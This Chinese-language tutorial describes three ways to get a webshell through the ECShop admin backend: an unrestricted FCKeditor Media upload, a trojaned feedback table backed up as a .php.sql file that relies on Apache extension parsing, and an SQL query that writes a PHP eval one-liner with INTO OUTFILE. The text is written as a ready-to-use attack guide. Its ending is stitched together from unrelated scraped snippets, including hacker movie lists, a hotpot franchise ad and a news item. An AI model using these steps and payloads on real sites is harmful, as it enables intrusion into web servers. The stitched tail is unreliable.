*** 一:龙儿心发明的,版本未定,估计都行。
进入后台-系统设置-Flash播放器管理
可以上传任意文件。
[includes/fckeditor /editor/filemanager/connectors/php/config.php文件对Media没有任何限制,直接Type=Media 上传你的webshell,访问路径为http://target/images/upload/Media/xxx.php]
*** 二:另外一种是利用ecshop后台的数据库备份功能
这里选择自定义备份,目的是使你备份出来的文件尽量的小,要是太大的话也很麻烦。
然后去前台留个言,内容是我们的一句话木马,接着在后台选择备份ecs_feedback这张表,就是存放留言的表,如图:
然后会显示备份成功。
但是ecshop备份的文件都强行会在你填的备份的名字后面加上.sql扩展名(元备份名我填的是l4yn3.php),如图。
这么做无非就是提高安全性,可是设计者忽略了一个问题,如果php是在apache下运行的,利用apache的文件解析漏洞这种方式形同虚设。
因为apache有个漏洞就是对文件名是1.php.sql这种形式,只要最后的文件扩展名是apache不能能解析的,他就会按照php文件来解析它,那在这里sql文件就是apache不能够解析的文件,那么他理所当然会把这个文件当作php文件来执行。
所以如果是apache+php的话,即使文件名变成了上面这样,也可以正常解析,你所需要做的就是点一下备份后的链接。
所以您看出来了,这种拿shell的方式是需要你的环境是apache+php的。而且还有个条件是GPC魔术转换不能开启,所以也很鸡肋。
*** 三:ecshop后台有一个功能是sql查询,如图:
其实感觉在一个管理系统的后台放这么个功能根本没用,有多少网站管理员有这么高的觉悟,会用这个?
不过也不错,便宜了我们小菜拿shell。
*** 就像phpmyadmin一样直接操作sql语句导出一句话木马拿shell。
语句如下:
show databases;
use 数据库名;
create a(cmd text not null);
insert into a(cmd) values('<?php eval($_POST[cmd]);?>');
select cmd from a into outfile '导出路径';
drop table if exists a;
很常规的语句。也许有人会问不知道网站路径怎么办,那要导出到哪呢?这里有一个技巧就是 use 数据库名; 这句话,其实在这个sql查询功能中默认用的数据库就是本网站的数据库,开发者设计的时候不会考虑你去use 其他的数据库,所以这里你用use 数据名库这句时,会产生一个警告,但并不影响sql的运行,却可以成功爆出网站的路径,多次测试均成功,如图:
本文导读目录: 1、森林黑客打一个动物 2、很久以前看的一部是日本都市电影动漫 3、世界最有名的侦探 4、一部黑客电影 好像叫什么防御的 5、被人威胁恐吓该怎么办?警察会管吗?会怎么处...
火锅行业因为有着众多消费者的喜欢,所以很多加盟商都想要加盟其中,导致这个行业的竞争也是非常激烈的。火锅行业品牌众多,每一个品牌都有着属于自己的竞争优势,而馋馋馋嘴猪转转火锅加盟作为一个知名品牌,优势自...
本文导读目录: 1、有没有游戏版黑客帝国? 2、黑客帝国几部额 3、求黑客帝国游戏版enter the matrix的详细剧情。 4、黑客帝国尼奥之路 5、求黑客帝国全系列游戏 6...
流动一 京东的推广流动,介入地址在京东APP右上角,或扫下方二维码, “新年开门红,全民抢红包”流动 将流动链接分享微信,有用户(微信绑定京东)点了你的链接,你就能获得价值不等的红包。 流动时...
本文目录一览: 1、沙雕模拟器黑客作弊码是什么 2、伪装黑客的代码是什么? 3、黑客DOS入侵代码大全 4、Hacker所必备的软件都那写? 沙雕模拟器黑客作弊码是什么 沙雕模拟器没有黑...
(从“九十后”到“九零后” 和平之声历久弥坚)志愿者范梓幸:带着奶奶的愿望走上和平的讲坛 中新网南京12月12日电 题:(从“九十后”到“九零后”和平之声历久弥坚)志愿者范梓幸:带着奶奶的愿...